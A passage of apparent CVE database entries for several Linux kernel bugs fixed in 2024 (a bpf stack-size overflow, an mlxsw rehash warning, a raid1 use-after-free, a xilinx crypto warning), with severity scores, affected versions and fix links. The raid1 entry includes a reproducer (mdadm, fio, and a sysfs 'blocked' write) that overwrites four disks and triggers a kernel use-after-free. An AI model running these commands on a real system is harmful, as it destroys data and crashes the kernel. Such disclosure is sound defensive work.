                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.6.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Protect against int overflow for stack access size\n\nThis patch re-introduces protection against the size of access to stack\nmemory being negative; the access size can appear negative as a result\nof overflowing its signed int representation. This should not actually\nhappen, as there are other protections along the way, but we should\nprotect against it anyway. One code path was missing such protections\n(fixed in the previous patch in the series), causing out-of-bounds array\naccesses in check_stack_range_initialized(). This patch causes the\nverification of a program with such a non-sensical access size to fail.\n\nThis check used to exist in a more indirect way, but was inadvertendly\nremoved in a833a17aeac7."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:03.837Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9970e059af471478455f9534e8c3db82f8c5496d"
        },
        {
          "url": "https://git.kernel.org/stable/c/37dc1718dc0c4392dbfcb9adec22a776e745dd69"
        },
        {
          "url": "https://git.kernel.org/stable/c/98cdac206b112bec63852e94802791e316acc2c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f0784b2f1eb9147973d8c43ba085c5fdf44ff69"
        },
        {
          "url": "https://git.kernel.org/stable/c/203a68151e8eeb331d4a64ab78303f3a15faf103"
        },
        {
          "url": "https://git.kernel.org/stable/c/ecc6a2101840177e57c925c102d2d29f260d37c8"
        }
      ],
      "title": "bpf: Protect against int overflow for stack access size",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35905",
    "datePublished": "2024-05-19T08:34:58.347Z",
    "dateReserved": "2024-05-17T13:50:33.120Z",
    "dateUpdated": "2025-05-04T12:56:03.837Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36007 (GCVE-0-2024-36007)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

mlxsw: spectrum_acl_tcam: Fix warning during rehash

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix warning during rehash As previously explained, the rehash delayed work migrates filters from one region to another. This is done by iterating over all chunks (all the filters with the same priority) in the region and in each chunk iterating over all the filters. When the work runs out of credits it stores the current chunk and entry as markers in the per-work context so that it would know where to resume the migration from the next time the work is scheduled. Upon error, the chunk marker is reset to NULL, but without resetting the entry markers despite being relative to it. This can result in migration being resumed from an entry that does not belong to the chunk being migrated. In turn, this will eventually lead to a chunk being iterated over as if it is an entry. Because of how the two structures happen to be defined, this does not lead to KASAN splats, but to warnings such as [1]. Fix by creating a helper that resets all the markers and call it from all the places the currently only reset the chunk marker. For good measures also call it when starting a completely new rehash. Add a warning to avoid future cases. [1] WARNING: CPU: 7 PID: 1076 at drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c:407 mlxsw_afk_encode+0x242/0x2f0 Modules linked in: CPU: 7 PID: 1076 Comm: kworker/7:24 Tainted: G W 6.9.0-rc3-custom-00880-g29e61d91b77b #29 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work RIP: 0010:mlxsw_afk_encode+0x242/0x2f0 [...] Call Trace: <TASK> mlxsw_sp_acl_atcam_entry_add+0xd9/0x3c0 mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x109/0x290 mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x470 process_one_work+0x151/0x370 worker_thread+0x2cb/0x3e0 kthread+0xd0/0x100 ret_from_fork+0x34/0x50 </TASK>

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0b88631855026b55c…
	https://git.kernel.org/stable/c/1d76bd2a0034d0d08…
	https://git.kernel.org/stable/c/039992b6d2df097c6…
	https://git.kernel.org/stable/c/751d352858108314e…
	https://git.kernel.org/stable/c/e890456051fe8c579…
	https://git.kernel.org/stable/c/17e9e0bbae652b9b2…
	https://git.kernel.org/stable/c/743edc8547a92b619…

Impacted products

Vendor

Product

Version

Linux

Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 0b88631855026b55cad901ac28d081e0f358e596 (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 1d76bd2a0034d0d08045c1c6adf2235d88982952 (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 039992b6d2df097c65f480dcf269de3d2656f573 (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 751d352858108314efd33dddd5a9a2b6bf7d6916 (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < e890456051fe8c57944b911defb3e6de91315861 (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 17e9e0bbae652b9b2049e51699e93dfa60b2988d (git)
Affected: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf , < 743edc8547a92b6192aa1f1b6bb78233fa21dc9b (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36007",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-31T18:47:44.179419Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T15:10:37.319Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:11.636Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0b88631855026b55cad901ac28d081e0f358e596"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d76bd2a0034d0d08045c1c6adf2235d88982952"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/039992b6d2df097c65f480dcf269de3d2656f573"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/751d352858108314efd33dddd5a9a2b6bf7d6916"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e890456051fe8c57944b911defb3e6de91315861"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17e9e0bbae652b9b2049e51699e93dfa60b2988d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/743edc8547a92b6192aa1f1b6bb78233fa21dc9b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0b88631855026b55cad901ac28d081e0f358e596",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "1d76bd2a0034d0d08045c1c6adf2235d88982952",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "039992b6d2df097c65f480dcf269de3d2656f573",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "751d352858108314efd33dddd5a9a2b6bf7d6916",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "e890456051fe8c57944b911defb3e6de91315861",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "17e9e0bbae652b9b2049e51699e93dfa60b2988d",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            },
            {
              "lessThan": "743edc8547a92b6192aa1f1b6bb78233fa21dc9b",
              "status": "affected",
              "version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix warning during rehash\n\nAs previously explained, the rehash delayed work migrates filters from\none region to another. This is done by iterating over all chunks (all\nthe filters with the same priority) in the region and in each chunk\niterating over all the filters.\n\nWhen the work runs out of credits it stores the current chunk and entry\nas markers in the per-work context so that it would know where to resume\nthe migration from the next time the work is scheduled.\n\nUpon error, the chunk marker is reset to NULL, but without resetting the\nentry markers despite being relative to it. This can result in migration\nbeing resumed from an entry that does not belong to the chunk being\nmigrated. In turn, this will eventually lead to a chunk being iterated\nover as if it is an entry. Because of how the two structures happen to\nbe defined, this does not lead to KASAN splats, but to warnings such as\n[1].\n\nFix by creating a helper that resets all the markers and call it from\nall the places the currently only reset the chunk marker. For good\nmeasures also call it when starting a completely new rehash. Add a\nwarning to avoid future cases.\n\n[1]\nWARNING: CPU: 7 PID: 1076 at drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c:407 mlxsw_afk_encode+0x242/0x2f0\nModules linked in:\nCPU: 7 PID: 1076 Comm: kworker/7:24 Tainted: G        W          6.9.0-rc3-custom-00880-g29e61d91b77b #29\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:mlxsw_afk_encode+0x242/0x2f0\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_entry_add+0xd9/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x109/0x290\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x470\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n \u003c/TASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:23.205Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0b88631855026b55cad901ac28d081e0f358e596"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d76bd2a0034d0d08045c1c6adf2235d88982952"
        },
        {
          "url": "https://git.kernel.org/stable/c/039992b6d2df097c65f480dcf269de3d2656f573"
        },
        {
          "url": "https://git.kernel.org/stable/c/751d352858108314efd33dddd5a9a2b6bf7d6916"
        },
        {
          "url": "https://git.kernel.org/stable/c/e890456051fe8c57944b911defb3e6de91315861"
        },
        {
          "url": "https://git.kernel.org/stable/c/17e9e0bbae652b9b2049e51699e93dfa60b2988d"
        },
        {
          "url": "https://git.kernel.org/stable/c/743edc8547a92b6192aa1f1b6bb78233fa21dc9b"
        }
      ],
      "title": "mlxsw: spectrum_acl_tcam: Fix warning during rehash",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36007",
    "datePublished": "2024-05-20T09:48:06.947Z",
    "dateReserved": "2024-05-17T13:50:33.151Z",
    "dateUpdated": "2025-05-04T09:10:23.205Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35979 (GCVE-0-2024-35979)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

raid1: fix use-after-free for original bio in raid1_write_request()

Summary

In the Linux kernel, the following vulnerability has been resolved: raid1: fix use-after-free for original bio in raid1_write_request() r1_bio->bios[] is used to record new bios that will be issued to underlying disks, however, in raid1_write_request(), r1_bio->bios[] will set to the original bio temporarily. Meanwhile, if blocked rdev is set, free_r1bio() will be called causing that all r1_bio->bios[] to be freed: raid1_write_request() r1_bio = alloc_r1bio(mddev, bio); -> r1_bio->bios[] is NULL for (i = 0; i < disks; i++) -> for each rdev in conf // first rdev is normal r1_bio->bios[0] = bio; -> set to original bio // second rdev is blocked if (test_bit(Blocked, &rdev->flags)) break if (blocked_rdev) free_r1bio() put_all_bios() bio_put(r1_bio->bios[0]) -> original bio is freed Test scripts: mdadm -CR /dev/md0 -l1 -n4 /dev/sd[abcd] --assume-clean fio -filename=/dev/md0 -ioengine=libaio -rw=write -bs=4k -numjobs=1 \ -iodepth=128 -name=test -direct=1 echo blocked > /sys/block/md0/md/rd2/state Test result: BUG bio-264 (Not tainted): Object already free ----------------------------------------------------------------------------- Allocated in mempool_alloc_slab+0x24/0x50 age=1 cpu=1 pid=869 kmem_cache_alloc+0x324/0x480 mempool_alloc_slab+0x24/0x50 mempool_alloc+0x6e/0x220 bio_alloc_bioset+0x1af/0x4d0 blkdev_direct_IO+0x164/0x8a0 blkdev_write_iter+0x309/0x440 aio_write+0x139/0x2f0 io_submit_one+0x5ca/0xb70 __do_sys_io_submit+0x86/0x270 __x64_sys_io_submit+0x22/0x30 do_syscall_64+0xb1/0x210 entry_SYSCALL_64_after_hwframe+0x6c/0x74 Freed in mempool_free_slab+0x1f/0x30 age=1 cpu=1 pid=869 kmem_cache_free+0x28c/0x550 mempool_free_slab+0x1f/0x30 mempool_free+0x40/0x100 bio_free+0x59/0x80 bio_put+0xf0/0x220 free_r1bio+0x74/0xb0 raid1_make_request+0xadf/0x1150 md_handle_request+0xc7/0x3b0 md_submit_bio+0x76/0x130 __submit_bio+0xd8/0x1d0 submit_bio_noacct_nocheck+0x1eb/0x5c0 submit_bio_noacct+0x169/0xd40 submit_bio+0xee/0x1d0 blkdev_direct_IO+0x322/0x8a0 blkdev_write_iter+0x309/0x440 aio_write+0x139/0x2f0 Since that bios for underlying disks are not allocated yet, fix this problem by using mempool_free() directly to free the r1_bio.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3f28d49a328fe2092…
	https://git.kernel.org/stable/c/f423f41b7679c09ab…
	https://git.kernel.org/stable/c/fcf3f7e2fc8a53a61…

Impacted products

Vendor

Product

Version

Linux

Affected: 992db13a4aee766c8bfbf046ad15c2db5fa7cab8 , < 3f28d49a328fe20926995d5fbdc92da665596268 (git)
Affected: 992db13a4aee766c8bfbf046ad15c2db5fa7cab8 , < f423f41b7679c09abb26d2bd54be5cbef23c9446 (git)
Affected: 992db13a4aee766c8bfbf046ad15c2db5fa7cab8 , < fcf3f7e2fc8a53a6140beee46ec782a4c88e4744 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35979",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:38:14.409469Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:40:22.888Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.042Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f28d49a328fe20926995d5fbdc92da665596268"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f423f41b7679c09abb26d2bd54be5cbef23c9446"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fcf3f7e2fc8a53a6140beee46ec782a4c88e4744"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/raid1.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3f28d49a328fe20926995d5fbdc92da665596268",
              "status": "affected",
              "version": "992db13a4aee766c8bfbf046ad15c2db5fa7cab8",
              "versionType": "git"
            },
            {
              "lessThan": "f423f41b7679c09abb26d2bd54be5cbef23c9446",
              "status": "affected",
              "version": "992db13a4aee766c8bfbf046ad15c2db5fa7cab8",
              "versionType": "git"
            },
            {
              "lessThan": "fcf3f7e2fc8a53a6140beee46ec782a4c88e4744",
              "status": "affected",
              "version": "992db13a4aee766c8bfbf046ad15c2db5fa7cab8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/raid1.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nraid1: fix use-after-free for original bio in raid1_write_request()\n\nr1_bio-\u003ebios[] is used to record new bios that will be issued to\nunderlying disks, however, in raid1_write_request(), r1_bio-\u003ebios[]\nwill set to the original bio temporarily. Meanwhile, if blocked rdev\nis set, free_r1bio() will be called causing that all r1_bio-\u003ebios[]\nto be freed:\n\nraid1_write_request()\n r1_bio = alloc_r1bio(mddev, bio); -\u003e r1_bio-\u003ebios[] is NULL\n for (i = 0;  i \u003c disks; i++) -\u003e for each rdev in conf\n  // first rdev is normal\n  r1_bio-\u003ebios[0] = bio; -\u003e set to original bio\n  // second rdev is blocked\n  if (test_bit(Blocked, \u0026rdev-\u003eflags))\n   break\n\n if (blocked_rdev)\n  free_r1bio()\n   put_all_bios()\n    bio_put(r1_bio-\u003ebios[0]) -\u003e original bio is freed\n\nTest scripts:\n\nmdadm -CR /dev/md0 -l1 -n4 /dev/sd[abcd] --assume-clean\nfio -filename=/dev/md0 -ioengine=libaio -rw=write -bs=4k -numjobs=1 \\\n    -iodepth=128 -name=test -direct=1\necho blocked \u003e /sys/block/md0/md/rd2/state\n\nTest result:\n\nBUG bio-264 (Not tainted): Object already free\n-----------------------------------------------------------------------------\n\nAllocated in mempool_alloc_slab+0x24/0x50 age=1 cpu=1 pid=869\n kmem_cache_alloc+0x324/0x480\n mempool_alloc_slab+0x24/0x50\n mempool_alloc+0x6e/0x220\n bio_alloc_bioset+0x1af/0x4d0\n blkdev_direct_IO+0x164/0x8a0\n blkdev_write_iter+0x309/0x440\n aio_write+0x139/0x2f0\n io_submit_one+0x5ca/0xb70\n __do_sys_io_submit+0x86/0x270\n __x64_sys_io_submit+0x22/0x30\n do_syscall_64+0xb1/0x210\n entry_SYSCALL_64_after_hwframe+0x6c/0x74\nFreed in mempool_free_slab+0x1f/0x30 age=1 cpu=1 pid=869\n kmem_cache_free+0x28c/0x550\n mempool_free_slab+0x1f/0x30\n mempool_free+0x40/0x100\n bio_free+0x59/0x80\n bio_put+0xf0/0x220\n free_r1bio+0x74/0xb0\n raid1_make_request+0xadf/0x1150\n md_handle_request+0xc7/0x3b0\n md_submit_bio+0x76/0x130\n __submit_bio+0xd8/0x1d0\n submit_bio_noacct_nocheck+0x1eb/0x5c0\n submit_bio_noacct+0x169/0xd40\n submit_bio+0xee/0x1d0\n blkdev_direct_IO+0x322/0x8a0\n blkdev_write_iter+0x309/0x440\n aio_write+0x139/0x2f0\n\nSince that bios for underlying disks are not allocated yet, fix this\nproblem by using mempool_free() directly to free the r1_bio."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:45.251Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3f28d49a328fe20926995d5fbdc92da665596268"
        },
        {
          "url": "https://git.kernel.org/stable/c/f423f41b7679c09abb26d2bd54be5cbef23c9446"
        },
        {
          "url": "https://git.kernel.org/stable/c/fcf3f7e2fc8a53a6140beee46ec782a4c88e4744"
        }
      ],
      "title": "raid1: fix use-after-free for original bio in raid1_write_request()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35979",
    "datePublished": "2024-05-20T09:42:04.424Z",
    "dateReserved": "2024-05-17T13:50:33.144Z",
    "dateUpdated": "2025-05-04T09:09:45.251Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26877 (GCVE-0-2024-26877)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

crypto: xilinx - call finalize with bh disabled

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: xilinx - call finalize with bh disabled When calling crypto_finalize_request, BH should be disabled to avoid triggering the following calltrace: ------------[ cut here ]------------ WARNING: CPU: 2 PID: 74 at crypto/crypto_engine.c:58 crypto_finalize_request+0xa0/0x118 Modules linked in: cryptodev(O) CPU: 2 PID: 74 Comm: firmware:zynqmp Tainted: G O 6.8.0-rc1-yocto-standard #323 Hardware name: ZynqMP ZCU102 Rev1.0 (DT) pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : crypto_finalize_request+0xa0/0x118 lr : crypto_finalize_request+0x104/0x118 sp : ffffffc085353ce0 x29: ffffffc085353ce0 x28: 0000000000000000 x27: ffffff8808ea8688 x26: ffffffc081715038 x25: 0000000000000000 x24: ffffff880100db00 x23: ffffff880100da80 x22: 0000000000000000 x21: 0000000000000000 x20: ffffff8805b14000 x19: ffffff880100da80 x18: 0000000000010450 x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 x14: 0000000000000003 x13: 0000000000000000 x12: ffffff880100dad0 x11: 0000000000000000 x10: ffffffc0832dcd08 x9 : ffffffc0812416d8 x8 : 00000000000001f4 x7 : ffffffc0830d2830 x6 : 0000000000000001 x5 : ffffffc082091000 x4 : ffffffc082091658 x3 : 0000000000000000 x2 : ffffffc7f9653000 x1 : 0000000000000000 x0 : ffffff8802d20000 Call trace: 